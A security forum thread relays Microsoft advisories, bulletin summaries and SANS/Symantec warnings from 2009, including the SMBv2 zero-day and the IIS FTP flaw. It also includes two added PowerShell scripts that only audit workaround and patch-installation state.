Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
Published: July 28, 2009 | Updated: August 11, 2009 - "...Updates related to ATL:
- Updates released on August 11, 2009
• MS09-037 - Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/bulletin/ms09-037.mspx
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
Published: July 28, 2009 | Updated: August 11, 2009
http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
- Updates released on July 28, 2009
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
• MS09-034 - Cumulative Security Update for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
- Update released on July 14, 2009
• MS09-032 - Cumulative Security Update of ActiveX Kill Bits
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
___

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Published: August 11, 2009 - "Microsoft is announcing the availability of a new feature, Extended Protection for Authentication, on the Windows platform. This feature enhances the protection and handling of credentials when authenticating network connections using Integrated Windows Authentication (IWA). The update itself does not directly provide protection against specific attacks such as credential forwarding, but allows applications to opt-in to Extended Protection for Authentication. This advisory briefs developers and system administrators on this new functionality and how it can be deployed to help protect authentication credentials... Apply the updates associated with security bulletin MS09-042...
http://www.microsoft.com/technet/security/bulletin/ms09-042.mspx

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
Published: July 13, 2009 | Updated: August 11, 2009 - "... We have issued MS09-043* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx


AplusWebMaster
2009-08-18, 15:26
FYI...

- http://isc.sans.org/diary.html?storyid=6976
Last Updated: 2009-08-18 10:24:24 UTC - "... the MS09-039* vulnerability is actively exploited in the wild. To remind you, this vulnerability affects servers with the WINS service installed. The patch fixes two vulnerabilities. We do not have any technical information yet. However, the DShield graph shows a relatively high increase in targets for port 42 (see http://isc.sans.org/port.html?port=42 )... TCP port 42 is used for WINS replication..."
* http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx

:fear::fear:

AplusWebMaster
2009-08-28, 00:59
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V3.0 (August 25, 2009): Advisory revised to provide details about the Windows Live Messenger* 14.0.8089 release and to communicate the removal of the Windows Live Hotmail "Attach Photo" feature.

* http://download.live.com/messenger

:fear:

AplusWebMaster
2009-08-29, 19:24
FYI...

MSRT August Top Detection Reports
- http://blogs.technet.com/mmpc/archive/2009/08/27/msrt-august-top-detection-reports.aspx
August 27, 2009

:fear:

AplusWebMaster
2009-08-31, 23:36
FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
• V1.1 (August 25, 2009): Summary revised to notify users of an update to Autorun that restricts AutoPlay functionality to CD-ROM and DVD-ROM media, available for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 from Microsoft Knowledge Base Article 971029*.
* http://support.microsoft.com/kb/971029

:fear:

AplusWebMaster
2009-09-02, 05:36
FYI...

Microsoft Security Advisory (975191)
Vulnerability in Internet Information Services FTP Service Could Allow for Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975191.mspx
September 01, 2009 - "Microsoft is investigating new public reports of a vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, and Microsoft Internet Information Services (IIS) 6.0. The vulnerability could allow remote code execution on affected systems that are running the FTP service and are connected to the Internet. Microsoft is aware that detailed exploit code has been published on the Internet for this vulnerability. Microsoft is -not- currently aware of active attacks that use this exploit code or of customer impact at this time...
(See: )
Workarounds...
Additional Suggested Actions..."
* http://support.microsoft.com/kb/975191
September 2, 2009

> http://secunia.com/advisories/36443/2/
Release Date: 2009-09-01

- http://www.microsoft.com/technet/security/advisory/975191.mspx
"... Microsoft is currently aware of limited attacks that use this exploit code..."
Workarounds...
• Do not allow FTP write access to anonymous users...
• Do not allow FTP access to anonymous users...
• Modify NTFS file system permissions to disallow directory creation by FTP users...
• Upgrade to FTP Service 7.5 - FTP Service 7.5 is available for Windows Vista and Windows Server 2008. This version of FTP Service is not affected by the vulnerabilities in this advisory...
• Disable the FTP Service...
---
• V2.0 (September 3, 2009): Advisory revised to add CVE-2009-2521 and to provide more information on affected software, mitigations, and workarounds.

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3023
Last revised: 09/04/2009
CVSS v2 Base Score: 9.0 (HIGH)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2521
Last revised: 09/04/2009

:fear:

AplusWebMaster
2009-09-04, 00:29
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-sep.mspx
September 03, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on September 8, 2009... (Total of 5)

Critical -5-

Bulletin 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 4
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 5
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

AplusWebMaster
2009-09-08, 20:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-sep.mspx
September 08, 2009 - "This bulletin summary lists security bulletins released for September 2009... security bulletins for this month in order of severity... (Total of -5-)

Critical -5-

Microsoft Security Bulletin MS09-045
Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961)
- http://www.microsoft.com/technet/security/bulletin/MS09-045.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-049
Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710)
- http://www.microsoft.com/technet/security/bulletin/MS09-049.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-047
Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812)
- http://www.microsoft.com/technet/security/bulletin/MS09-047.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-048
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (967723)
- http://www.microsoft.com/technet/security/bulletin/MS09-048.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-046
Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844)
- http://www.microsoft.com/technet/security/bulletin/MS09-046.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows
___

MS09-045 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1920
MS09-046 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2519
MS09-047 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2498
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2499
MS09-048 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4609
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1925
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1926
MS09-049 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1132
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7099
Last Updated: 2009-09-08 19:14:07 UTC
___

MS Severity and Exploitability Index
- http://blogs.technet.com/photos/msrcteam/images/3279846/original.aspx

MS Deployment Prioritization Assessment
- http://blogs.technet.com/photos/msrcteam/images/3279847/original.aspx

.

AplusWebMaster
2009-09-09, 05:41
FYI...

Vista/2008/Windows7 SMB2 BSOD 0-Day
- http://isc.sans.org/diary.html?storyid=7093
Last Updated: 2009-09-08 13:09:06 UTC - "... vulnerability affecting Microsoft SMB2* can be remotely crashed with proof-of-concept code that has been published yesterday and a Metasploit module is out. We have confirmed it affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled, with one packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall. Windows 2000/XP are NOT affected by this exploit..."
* http://en.wikipedia.org/wiki/Server_Message_Block#SMB2
___

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
September 08, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs...
Workarounds...
• Disable SMB v2... modify the registry key...
• Block TCP ports 139 and 445 at the firewall..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103
Last revised: 09/09/2009

- http://www.symantec.com/connect/blogs/bsod-and-possibly-more
September 15, 2009

:fear:

AplusWebMaster
2009-09-17, 12:41
FYI...

SMB2 remote exploit released
- http://isc.sans.org/diary.html?storyid=7141
Last Updated: 2009-09-16 21:15:36 UTC - "... 0-day vulnerability in SMB2 on Windows Vista and Server 2008 operating systems... Yesterday a well known security company added a module for their exploitation product. The module contains the remote exploit for this vulnerability – in other words, any user running this tool can get full access to affected machines. If the exploit is stable enough, it can _very easily_ be used in a worm, so it can potentially be devastating. So, if you are running a Windows Vista or Server 2008 machine (Windows 7 RTM is not affected, RC *is*), be sure you apply one of the workarounds listed by Microsoft (they are not perfect, but they can help), available here*..."
* http://www.microsoft.com/technet/security/advisory/975497.mspx

- http://www.theregister.co.uk/2009/09/16/windows_vista_exploit_released/
16 September 2009

:fear::mad::fear:

AplusWebMaster
2009-09-18, 01:18
FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
Updated: September 17, 2009 - "...Workarounds:
• Disable SMB v2... See Microsoft Knowledge Base Article 975497* to use the automated Microsoft Fix it solution to enable or disable this workaround...
* http://support.microsoft.com/kb/975497

• V1.1 (September 17, 2009): Clarified the FAQ, What is SMBv2? Added a link to Microsoft Knowledge Base Article 975497 to provide an automated Microsoft Fix it solution* for the workaround, Disable SMB v2...

- http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx
September 18, 2009

:fear:

AplusWebMaster
2009-09-24, 00:47
FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V1.2 (September 23, 2009): Clarified the FAQ, What is Server Message Block Version 2 (SMBv2)? Also clarified the impact of the workaround, Disable SMB v2.
(See: "Workarounds... Impact of Workaround...")
"... Some of the applications or services that could be impacted are listed..."

:fear:
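The advisory's two workarounds quoted in the posts above (Disable SMB v2 via the registry, block TCP 139/445 at the firewall) and the later note that the workaround has application impact call for a way to see what state a host is actually in. The script below is an added PowerShell example for a Vista/Server 2008 host; it is not Microsoft's Fix it and not part of the thread. The registry value name it reads (LanmanServer\Parameters\Smb2) is an assumption to confirm against KB 975497, and the netstat/netsh parsing only shows local state, so an upstream firewall block is not visible to it.

```powershell
# Added example: audit a host for the Microsoft Security Advisory 975497 workarounds.
# Assumptions (not stated on the page): the "Disable SMB v2" workaround toggles the
# registry value below (DWORD 0 = disabled); confirm against KB 975497 before relying on it.
$Smb2KeyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$Smb2ValueName = 'Smb2'   # assumed value name; absent or 1 = SMBv2 enabled (default)

function Get-Smb2State {
    $item = Get-ItemProperty -Path $Smb2KeyPath -Name $Smb2ValueName -ErrorAction SilentlyContinue
    if ($item -eq $null) { return 'Enabled (value absent, default)' }
    if ($item.$Smb2ValueName -eq 0) { return 'Disabled (workaround applied)' }
    return "Enabled (value = $($item.$Smb2ValueName))"
}

function Test-FileSharingListening {
    # The Server service (LanmanServer) is what accepts SMB on TCP 445; the ISC note says
    # the crash needs file sharing enabled, so report both the service and the listener.
    $svc = Get-Service -Name LanmanServer -ErrorAction SilentlyContinue
    $status = 'NotFound'
    if ($svc) { $status = $svc.Status }
    $listening = netstat -an | Select-String -Pattern ':445\s+\S+\s+LISTENING'
    New-Object PSObject -Property @{
        ServerServiceStatus = $status
        Tcp445Listening     = [bool]$listening
    }
}

function Get-FirewallBlockRulesForSmb {
    # Local Windows Firewall inbound rules that block 139 or 445. netsh prints one
    # "field: value" line per attribute, with Action as the last line of each rule.
    $raw = netsh advfirewall firewall show rule name=all dir=in 2>$null
    $rules = @(); $name = $null; $port = ''
    foreach ($line in $raw) {
        if ($line -match '^Rule Name:\s+(.*)$')      { $name = $matches[1]; $port = '' }
        elseif ($line -match '^LocalPort:\s+(.*)$')  { $port = $matches[1] }
        elseif ($line -match '^Action:\s+(.*)$') {
            if ($port -match '\b(139|445)\b' -and $matches[1] -eq 'Block') {
                $rules += New-Object PSObject -Property @{ Rule = $name; LocalPort = $port }
            }
        }
    }
    return $rules
}

"SMBv2 state       : $(Get-Smb2State)"
$fs = Test-FileSharingListening
"Server service    : $($fs.ServerServiceStatus)"
"TCP 445 listening : $($fs.Tcp445Listening)"
$blocks = @(Get-FirewallBlockRulesForSmb)
if ($blocks.Count -eq 0) { "Firewall          : no local inbound Block rule for TCP 139/445 found" }
else { $blocks | Format-Table Rule, LocalPort -AutoSize }
```

Run it elevated, since the LanmanServer parameters key and the firewall rule listing may not be readable otherwise. A host showing "Enabled" for SMBv2, the Server service running, 445 listening and no block rule has neither workaround in place; the later post's caveat still applies, so check the advisory's "Impact of Workaround" list before disabling SMBv2 on a file server.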

AplusWebMaster
2009-09-29, 15:53
FYI...

Metasploit exploit module released
- http://www.symantec.com/security_response/threatconlearn.jsp
"... tracking a remotely exploitable vulnerability affecting the SMB kernel component ('srv2.sys'). Microsoft has reported that Windows Vista (SP1 and SP2) and Windows Server 2008 are affected. Reportedly, some beta builds of Windows 7 may also be affected.

On September 28, 2009, a remote code-execution exploit Metasploit module was released publicly. Attackers may be able to convert this module into other exploits and use it in the wild. We strongly advise users to block TCP port 445 immediately until patches are available. The researcher who discovered the flaw has stated that file sharing must be enabled for the issue to be exploited. Unless file sharing is explicitly required, users should disable it..."

:fear:

AplusWebMaster
2009-10-09, 00:20
FYI...

- http://www.theregister.co.uk/2009/10/09/patch_tues_oct_pre_alert/
9 October 2009 - "... biggest ever Patch Tuesday update... 13 bulletins collectively address 34 security flaws..."

- http://www.microsoft.com/technet/security/Bulletin/MS09-oct.mspx
October 8, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on October 13, 2009... (Total of -13-)

Critical -8-

Bulletin 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 5
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Bulletin 6
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 11
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Bulletin 12
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Microsoft Silverlight

Bulletin 13
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Microsoft Office, Microsoft SQL Server, Microsoft Developer Tools, Microsoft Forefront

Important -5-

Bulletin 4
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 7
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 8
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 9
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Bulletin 10
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: May require restart
Affected Software: Microsoft Windows
___

October 2009 Bulletin Release Advance Notification
- http://blogs.technet.com/msrc/archive/2009/10/08/october-2009-bulletin-release.aspx
October 08, 2009 - "... Among the updates this month, we are closing out two current security advisories:
• Vulnerabilities in SMB Could Allow Remote Code Execution (975497)
http://www.microsoft.com/technet/security/advisory/975497.mspx
• Vulnerabilities in the FTP Service in Internet Information Services (975191)
http://www.microsoft.com/technet/security/advisory/975191.mspx
Usually we do not go into this level of detail in the advance notification but we felt that it is important guidance so customers can plan accordingly and deploy these updates as soon as possible..."

.

AplusWebMaster
2009-10-13, 20:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-oct.mspx
October 13, 2009 - "This bulletin summary lists security bulletins released for October 2009...
(Total of -13-)

Critical -8-

Microsoft Security Bulletin MS09-050
Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-051
Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682)
- http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-052
Vulnerability in Windows Media Player Could Allow Remote Code Execution (974112)
- http://www.microsoft.com/technet/security/bulletin/ms09-052.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-054
Cumulative Security Update for Internet Explorer (974455)
- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-055
Cumulative Security Update of ActiveX Kill Bits (973525)
- http://www.microsoft.com/technet/security/bulletin/ms09-055.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-060
Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution (973965)
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Microsoft Security Bulletin MS09-061
Vulnerabilities in the Microsoft .NET Common Language Runtime Could Allow Remote Code Execution (974378)
- http://www.microsoft.com/technet/security/bulletin/ms09-061.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework, Microsoft Silverlight

Microsoft Security Bulletin MS09-062
Vulnerabilities in GDI+ Could Allow Remote Code Execution (957488)
- http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Internet Explorer, Microsoft .NET Framework, Microsoft Office, Microsoft SQL Server, Microsoft Developer Tools, Microsoft Forefront

Important -5-

Microsoft Security Bulletin MS09-053
Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-056
Vulnerabilities in Windows CryptoAPI Could Allow Spoofing (974571)
- http://www.microsoft.com/technet/security/bulletin/ms09-056.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-057
Vulnerability in Indexing Service Could Allow Remote Code Execution (969059)
- http://www.microsoft.com/technet/security/bulletin/ms09-057.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-058
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (971486)
- http://www.microsoft.com/technet/security/bulletin/ms09-058.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-059
Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (975467)
- http://www.microsoft.com/technet/security/bulletin/ms09-059.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7345
Last Updated: 2009-10-13 21:08:21 UTC
___

Severity summary and exploitability index
- http://blogs.technet.com/photos/msrcteam/images/3286577/original.aspx
October 13, 2009

Deployment priority
- http://blogs.technet.com/photos/msrcteam/images/3286578/original.aspx
October 13, 2009
___

MSRT
- http://support.microsoft.com/?kbid=890830
October 13, 2009 - Revision: 65.0
(Recent additions)
Win32/FakeRean August 2009 (V 2.13) Moderate
Win32/Bredolab September 2009 (V 2.14) Moderate
Win32/Daurso September 2009 (V 2.14) Moderate
Win32/FakeScanti October 2009 (V 3.0) Moderate
- http://www.microsoft.com/security/malwareremove/families.aspx

//

AplusWebMaster
2009-10-14, 13:30
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V4.0 (October 13, 2009): Advisory revised to add an entry in the Updates related to ATL section to communicate the release of Microsoft Security Bulletin MS09-060, "Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution."
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx

Microsoft Security Advisory (975191)
Vulnerabilities in the FTP Service in Internet Information Services
- http://www.microsoft.com/technet/security/advisory/975191.mspx
• V3.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-053).
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V2.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-050).
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx

:fear:

AplusWebMaster
2009-10-14, 14:22
FYI...

Do NOT Apply MS09-056/KB974571 to LCS/OCS Servers
- http://blogs.technet.com/dodeitte/archive/2009/10/13/do-not-apply-kb974571-to-lcs-ocs-servers.aspx
October 13, 2009 11:04 PM - "Currently an issue is being observed after applying KB974571 (MS09-056: Vulnerabilities in CryptoAPI could allow spoofing) to LCS/OCS servers, that is causing them to believe that they are running an evaluation version of LCS/OCS and that it has expired..."
- http://support.microsoft.com/kb/974571/

:fear::fear:

AplusWebMaster
2009-10-16, 05:15
FYI...

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Updated: October 14, 2009 - "... Microsoft Security Bulletin MS09-054 contains a defense-in-depth, non-security update that enables WinINET to opt in to Extended Protection for Authentication.
• V1.1 (October 14, 2009): Updated the FAQ with information about a non-security update included in MS09-054* relating to WinINET.
* http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

:spider:

AplusWebMaster
2009-11-03, 14:48
FYI...

Update released for MS09-054
- http://blogs.technet.com/msrc/archive/2009/11/02/update-released-for-ms09-054.aspx
November 02, 2009 - "Today we released an update 976749 that addresses two issues with MS09-054 that a limited number of customers reported to us through our Customer Service and Support (CSS) group. These two issues can affect the proper display of web pages. For additional details, please refer to Microsoft Knowledge Base article 976749*. Security update MS09-054 was released as part of the October Security Bulletin Release cycle and protects against the vulnerabilities outlined in the bulletin. Also, we’re not currently aware of any attempts to attack the vulnerabilities. While the number of customers affected by these two issues is limited, after working both with affected customers and our CSS group, we feel the best thing for all customers is to proactively provide this update as widely as possible to help prevent other customers from encountering the issues outlined in the KB. Because of this, we plan to release this update through the same broad release channels as the original security update, MS09-054. Customers will see 976749 offered by default through Windows Update, Microsoft Update, and Automatic Updates. Customers who have applied MS09-054 should go ahead and apply 976749. Customers who have not yet applied MS09-054 should apply -both- MS09-054 and 976749..."
* http://support.microsoft.com/kb/976749
November 3, 2009 - Revision: 5.0 - "...Important: Do not install this update if you have not installed security update 974455. If you install this update without first installing security update 974455, Internet Explorer may not work correctly. If this occurs, uninstall this update, install security update 974455, and then reinstall this update..."

- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
• V2.0 (November 2, 2009): Revised to announce the availability of a hotfix to address application compatibility issues. Customers who have already applied this update may install the hotfix from Microsoft Knowledge Base Article 976749. Also corrected the log file names, spuninst folder names, and registry key values for Microsoft Windows 2000.

- http://secunia.com/advisories/36979/2/
Critical: Highly critical
2009-11-03: Updated "Solution" section as Microsoft issues an update to address certain problems introduced by the original patches. Added link in "Original Advisory" section.

:fear:
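Two of the posts above carry install-state rules that are easy to get wrong on a fleet: KB 976749 must not be installed unless security update 974455 (MS09-054) is already present, and the TechNet post on MS09-056 says KB974571 should not be applied to LCS/OCS servers. The script below is an added PowerShell example that reads installed updates from Win32_QuickFixEngineering and reports which rule a host violates; it is not from the thread or from Microsoft. Assumptions: QFE records these packages with HotFixID "KBnnnnnn" (some installer types are not recorded there, so treat "absent" as "not recorded" and confirm in Add/Remove Programs), and the RTCSRV service is used as the marker for an OCS/LCS front end.

```powershell
# Added example: check a host against the MS09-054 / 976749 ordering rule and the
# MS09-056 (KB974571) LCS/OCS caution from the posts above.
$SecurityUpdate = 'KB974455'   # MS09-054 cumulative IE update
$Hotfix         = 'KB976749'   # compatibility hotfix; KB says it needs 974455 installed first
$CryptoApiFix   = 'KB974571'   # MS09-056; reported to break LCS/OCS licensing
$OcsServiceName = 'RTCSRV'     # assumed marker for an OCS/LCS front-end role

function Get-InstalledKBs {
    # Win32_QuickFixEngineering lists updates applied through Windows Update / Update.exe.
    Get-WmiObject -Class Win32_QuickFixEngineering |
        ForEach-Object { $_.HotFixID.ToUpper() }
}

function Test-Ms09054State {
    param([string[]]$Installed)
    $hasSec = $Installed -contains $SecurityUpdate
    $hasFix = $Installed -contains $Hotfix
    if ($hasFix -and -not $hasSec) {
        # KB 976749: IE may not work correctly; uninstall 976749, install 974455, reinstall 976749.
        return 'INVALID: 976749 present without 974455'
    }
    if ($hasSec -and -not $hasFix) { return 'ACTION: MS09-054 present, apply 976749' }
    if (-not $hasSec)              { return 'ACTION: apply both 974455 and 976749' }
    return 'OK: 974455 and 976749 both present'
}

function Test-LcsOcsExposure {
    param([string[]]$Installed)
    $ocs = Get-Service -Name $OcsServiceName -ErrorAction SilentlyContinue
    if ($ocs -and ($Installed -contains $CryptoApiFix)) {
        return 'WARNING: KB974571 installed on a host running an LCS/OCS service'
    }
    if ($ocs) { return 'NOTE: LCS/OCS service present; hold KB974571 per the TechNet post' }
    return 'No LCS/OCS conflict detected'
}

$installed = @(Get-InstalledKBs)
"Recorded updates  : $($installed.Count)"
"MS09-054 / 976749 : $(Test-Ms09054State -Installed $installed)"
"LCS/OCS check     : $(Test-LcsOcsExposure -Installed $installed)"
```

Wrap the two Test- functions in Invoke-Command or a logon script to run the same check across servers; the text strings are deliberately prefixed (OK, ACTION, INVALID, WARNING) so the output can be grepped from a central log.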

AplusWebMaster
2009-11-06, 07:18
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-nov.mspx
November 05, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on November 10, 2009..."
(Total of -6-)

Critical -3-

Bulletin 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Bulletin 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

